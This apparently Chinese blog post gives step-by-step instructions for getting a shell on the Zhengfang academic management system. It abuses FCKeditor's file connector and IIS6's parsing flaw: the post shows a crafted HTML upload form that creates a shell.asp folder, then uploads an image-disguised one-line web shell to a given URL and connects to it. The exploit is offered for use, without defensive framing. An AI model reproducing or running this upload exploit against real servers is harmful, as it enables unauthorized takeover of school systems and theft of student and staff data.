正方教务管理系统漏洞（getshell）

作者：hack1990 时间：11-12-22 阅读数：1663人阅读

比较鸡肋，利用IIS6解析，需支持asp。

很简单的一个问题，又是死在fckeditor编辑器上。

http://www.xxx.com/FCKeditor/edi ... ;uuid=1244789975684

建立一文件夹shell.asp

构造一表单，上传图片一句话马

<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?

Command=FileUpload&Type=Media&CurrentFolder=shell.asp" method="post">

上传文件:<br>

<input type="file" name="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">

http://www.xxx.com/userfiles/media/shell.asp/test_asp;1.jpg

连接之。。。。

# Nmap Security Scanner 7.0

上一篇：3389远程断开就注销的解决方案

下一篇：CSDN 数据库600万用户账号密码被盗及各大网站数据库被拖

正方教务管理系统漏洞（getshell）

相关文章

发表评论